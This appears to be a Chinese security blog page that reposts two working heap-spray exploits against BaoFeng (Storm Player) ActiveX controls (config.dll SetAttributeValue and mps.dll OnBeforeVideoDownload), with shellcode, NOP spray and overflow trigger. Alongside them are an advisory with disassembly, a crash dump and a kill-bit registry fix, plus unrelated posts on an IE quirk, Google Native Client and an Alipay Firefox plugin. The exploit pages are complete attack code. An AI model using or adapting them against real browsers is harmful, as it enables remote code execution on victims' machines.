#
# BaoFeng (config.dll) ActiveX Remote Code Execution Exploit
# Exploit made by etirah
# Download: www.baofeng.com
#
# Problem DLL : config.dll
# Problem Func : SetAttributeValue(param1,param2,param3)
# Problem Param : param1
#
# References:
# 1. http://forum.eviloctal.com/viewthread.php?tid=35051
# 2. http://www.milw0rm.com/exploits/8579
<html>
<body>
<object classid="clsid:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05" id="target"></object>
<script>
function test()
{
// PoC trigger for the Config.dll SetAttributeValue stack overflow analysed further
// down this page: the first argument is wcscpy'd into a fixed 0x208-byte stack
// buffer with no length check. Setting the kill bit on CLSID
// BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05 (the .REG text at the end of the page)
// stops IE from instantiating the control at all, which is the only host-side
// fix short of a vendor patch.
//show messagebox
var shellcode = unescape("\u68fc\u0a6a\u1e38\u6368\ud189\u684f\u7432\u0c91\uf48b\u7e8d\u33f4\ub7db\u2b04\u66e3\u33bb\u5332\u7568\u6573\u5472\ud233\u8b64\u305a\u4b8b\u8b0c\u1c49\u098b\u698b\uad08\u6a3d\u380a\u751e\u9505\u57ff\u95f8\u8b60\u3c45\u4c8b\u7805\ucd03\u598b\u0320\u33dd\u47ff\u348b\u03bb\u99f5\ube0f\u3a06\u74c4\uc108\u07ca\ud003\ueb46\u3bf1\u2454\u751c\u8be4\u2459\udd03\u8b66\u7b3c\u598b\u031c\u03dd\ubb2c\u5f95\u57ab\u3d61\u0a6a\u1e38\ua975\udb33\u6853\u6574\u7473\uc48b\u6853\u3a20\u292d\u7468\u2065\u6820\u6168\u6972\ud48b\u5053\u5352\u57ff\u53fc\u57ff\u00f8");
// Four 0x90 bytes; doubled below until it is at least as long as the payload.
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace)
bigblock+=bigblock;
// NOTE(review): fillblock, block, memory and x are assigned without var and
// therefore become implicit globals.
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
// Each block is grown to just under 0x40000 UTF-16 units (~512 KB).
while(block.length+slackspace<0x40000)
block = block+block+fillblock;
// 300 near-identical ~512 KB strings are retained in one array. A page script
// allocating on this scale is exactly what heap-spray heuristics and browser
// memory telemetry flag; it is the detectable part of this PoC.
memory = new Array();
for (x=0; x<300; x++)
memory[x] = block + shellcode;
// 264 UTF-16 units (528 bytes) of 0x0c as the first argument — larger than the
// 0x208-byte (520-byte) stack buffer identified in the disassembly below.
var buffer = '';
while (buffer.length < 264)
buffer+=unescape("%u0c0c%u0c0c");
target.SetAttributeValue(buffer, ":-)", "(-:");
}
test();
</script>
</body>
</html>
转自:http://www.pcsec.org/archives/BaoFeng-config-dll-ActiveX-Remote-Code-Execution-Exploit.html
在IE下,获取Param的时候有个诡异现象(不知道算不算bug)。为了清晰起见,下面用最简单的HTML和JavaScript来说明。有这么一段HTML(head部分是标准的head,doctype使用xhtml-transitional的DTD):
<body>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="100%" height="100%">
<param name="movie" value="Test.swf" />
<param name="quality" value="high" />
<embed src="Test.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%"></embed>
</object>
<object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=9,0,28,0" width="100%" height="100%">
<param name="movie" value="Test.swf" />
<param name="quality" value="high" />
<embed src="Test.swf" quality="high" pluginspage="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="100%" height="100%"></embed>
</body>
</object>
现在,我们分别用两种方式来获取第一个object(swf)的param参数个数:
// Demonstrates the IE quirk described in the surrounding text: for the first
// <object> above, the two counts below disagree (the text reports 4 and 2).
var o = document.getElementsByTagName('object')[0];
// Every <param> descendant of the object, not just direct children.
alert(o.getElementsByTagName('param').length);
// Direct child nodes only.
alert(o.childNodes.length);
猜猜结果分别是什么?还有,再猜猜o.innerHTML是什么?大家可以自己试试。上面的结果分别是4和2,是不是很诡异?
转自:http://ooboy.net/blog/article/687.aspx
#
# BaoFeng (mps.dll) Remote Code Execution Exploit
# By: MITBOY
# Download: www.baofeng.com
#
# Problem DLL : mps.dll
# Problem Func : OnBeforeVideoDownload()
<html>
<body>
<object classid="clsid:6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB" id="target"></object>
<input type="button" onclick="test()" value="test" />
<script>
function test()
{
// PoC trigger for the mps.dll OnBeforeVideoDownload issue named in the header
// above. Unlike the Config.dll case, this page gives no disassembly for it, so
// the buffer size and overflow mechanics are not established here. The kill-bit
// mitigation given at the end of the page targets a different CLSID; this
// control (6BE52E1D-E586-474F-A6E2-1A85A9B4D9FB) would need its own kill bit.
var shellcode = unescape("%uE8FC%u0044%u0000%u458B%u8B3C%u057C%u0178%u8BEF%u184F%u5F8B%u0120%u49EB%u348B%u018B%u31EE%u99C0%u84AC%u74C0%uC107%u0DCA%uC201%uF4EB%u543B%u0424%uE575%u5F8B%u0124%u66EB%u0C8B%u8B4B%u1C5F%uEB01%u1C8B%u018B%u89EB%u245C%uC304%uC031%u8B64%u3040%uC085%u0C78%u408B%u8B0C%u1C70%u8BAD%u0868%u09EB%u808B%u00B0%u0000%u688B%u5F3C%uF631%u5660%uF889%uC083%u507B%u7E68%uE2D8%u6873%uFE98%u0E8A%uFF57%u63E7%u6C61%u0063");
// Four 0x90 bytes; doubled below until it is at least as long as the payload.
var bigblock = unescape("%u9090%u9090");
var headersize = 20;
var slackspace = headersize+shellcode.length;
while (bigblock.length<slackspace)
bigblock+=bigblock;
// NOTE(review): fillblock, block, memory and x are assigned without var and
// therefore become implicit globals.
fillblock = bigblock.substring(0, slackspace);
block = bigblock.substring(0, bigblock.length-slackspace);
// Each block is grown to just under 0x40000 UTF-16 units (~512 KB).
while(block.length+slackspace<0x40000)
block = block+block+fillblock;
// Same 300 x ~512 KB allocation pattern as the Config.dll PoC earlier on this
// page; the sudden heap growth is the observable, detectable signature.
memory = new Array();
for (x=0; x<300; x++)
memory[x] = block + shellcode;
// 4152-character string of 0x0c passed as the sole argument; why this length
// is needed is not explained anywhere on the page.
var buffer = '';
while (buffer.length < 4150)
buffer+="\x0c\x0c\x0c\x0c";
target.OnBeforeVideoDownload(buffer);
}
</script>
</body>
</html>
转自:http://www.rootkit.net.cn/default.asp?id=119
暴风影音2009(Config.dll)ActiveX远程栈溢出漏洞
by bugvuln(bugvuln_at_gmail.com)
niklen(niklenxyz_at_gmail.com)
描述:
暴风影音是国内一款相当流行的万能播放器
http://www.baofeng.com/
受影响的系统:
暴风影音2009 <=[3.09.04.17]
细节:
clsid:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05
C:\Program Files\StormII\Config.dll
Sub SetAttributeValue (
ByVal lpQueryStr As String ,
ByVal bstrAttributeName As String ,
ByVal lpValueStr As String
)
当参数lpQueryStr是一个超长字符串时,发生栈溢出,利用堆填充技术,攻击者可以很轻松的利用此漏洞执行任意代码
分析:
.text:10009A4C push ebp
.text:10009A4D mov ebp, esp
.text:10009A4F sub esp, 208h ; 开辟208h的堆栈空间
.text:10009A55 cmp [ebp+Source], 0 ; 判断参数1是否为空
.text:10009A59 jz short loc_10009AA8
.text:10009A5B cmp [ebp+arg_C], 0 ; 判断参数3是否为空
.text:10009A5F jz short loc_10009AA8
.text:10009A61 push [ebp+Source] ; 参数1
.text:10009A64 lea eax, [ebp+String]
.text:10009A6A push eax ; eax正好指向ebp-208h的堆栈区域
.text:10009A6B call ds:wcscpy ; oh,my god,不进行参数合法性检查,直接开始拷贝操作,
.text:10009A6B ; 哦豁了,eax指向的堆栈区域全部被超长非法参数占领了-_-!
.text:10009A71 pop ecx
.text:10009A72 lea eax, [ebp+String]
.text:10009A78 pop ecx
.text:10009A79 push [ebp+arg_8]
.text:10009A7C push offset String ; "/@"
.text:10009A81 push offset aSS ; "%s%s"
.text:10009A86 push eax ; String
.text:10009A87 call ds:swprintf ; 上面的拷贝直接影响到这里的swprintf,相当于再对eax指向的堆栈进行一次拷贝操作
; 没有上边的拷贝,这里也要出问题
.text:10009A8D add esp, 10h
.text:10009A90 lea eax, [ebp+String]
.text:10009A96 push [ebp+arg_C]
.text:10009A99 push eax
.text:10009A9A call sub_10001201
.text:10009A9F mov ecx, eax
.text:10009AA1 call sub_1000CC9A
.text:10009AA6 jmp short locret_10009AAD
.text:10009AA8 ; ---------------------------------------------------------------------------
.text:10009AA8
.text:10009AA8 loc_10009AA8: ; CODE XREF: sub_10009A4C+Dj
.text:10009AA8 ; sub_10009A4C+13j
.text:10009AA8 mov eax, 80004005h
.text:10009AAD
.text:10009AAD locret_10009AAD: ; CODE XREF: sub_10009A4C+5Aj
.text:10009AAD leave
.text:10009AAE retn 10h ; 就这样返回,哦豁了
ModLoad: 41f50000 41fc7000 C:\WINDOWS\system32\mshtmled.dll
ModLoad: 10000000 10020000 C:\Program Files\StormII\Config.dll
ModLoad: 63380000 633f8000 C:\WINDOWS\system32\jscript.dll
(eec.ee8): Illegal instruction - code c000001d (first chance)
(eec.ee8): Illegal instruction - code c000001d (!!! second chance !!!)
eax=80004005 ebx=100116b0 ecx=0175f998 edx=00030001 esi=0039fe98 edi=00000000
eip=00410061 esp=0175f5ec ebp=00410041 iopl=0 nv up ei pl nz ac po nc
cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00000212
*** ERROR: Module load completed but symbols could not be loaded for C:\Program Files\Internet Explorer\IEXPLORE.EXE
IEXPLORE+0x10061:
00410061 ff ???
解决办法:
在厂商没有推出相应的补丁之前,
建议用户通过注册表对相应的CLSID:BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05设置Killbit
或者将以下文本保存为.REG文件并导入:
Windows Registry Editor Version 5.00
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{BD103B2B-30FB-4F1E-8C17-D8F6AADBCC05}]
"Compatibility Flags"=dword:00000400
–EOF–
据国外媒体报道,Google公布了新的软件开发计划,它允许网络开发者编写更强大的Web程序,这些程序直接通过系统运行而不用通过浏览器来进行。Google工程师在几天前发布了名为Native Client的开发软件,它是一款开源软件。虽然目前正处于发展的早期。
但是Google称,它到最后将允许网络开发者开发和桌面软件一样的web程序,这些程序将带来更快的速度。Native Client类似于微软的ActiveX技术,它还能在Linux和Mac OS X下运行。目前它尚未支持IE,仅支持Google Chrome, Firefox, Safari 和Opera。
转自:http://www.cnbeta.com/articles/71827.htm
郁闷,以前为了这个伤透了脑筋,找到过一个可以让Firefox支持activex的插件,不过功能很少,而且对安全性有点怀疑,所以就没有用.平时用支付宝都是直接用Firefox上的ie tab了,今天无意间看到支付宝上的有非IE的控件下载,嘿嘿,马上试用,不过效果不佳.不知道是不是人品问题,偶装了插件也不能用..无语了,下面有下载地址,大家可以试下看能不能用.....看图

Alipay官方提供的 https://img.alipay.com/download/aliedit/npaliedit.exe
Mozilla提供的 https://addons.mozilla.org/zh-CN/firefox/addon/6707
这两个地址都为安全链接,请大家在网上下载时注意安全哦...
绿色版的Firefox建议安装Mozilla提供的插件,直接就会安装了.因为Alipay提供的会检测注册表中是否有Firefox的安装路径,要是绿色版的话,因为不存在,所以无法安装,当然可以采用软件解包一下安装程序,把app目录中的两个文件npaliedit.dll npaliedit.xpt拷到Firefox的plugins目录就好了.我安装的时候两种方法全试了,不过不行,就是一直如上图提示请点此处输入密码,郁闷死我了.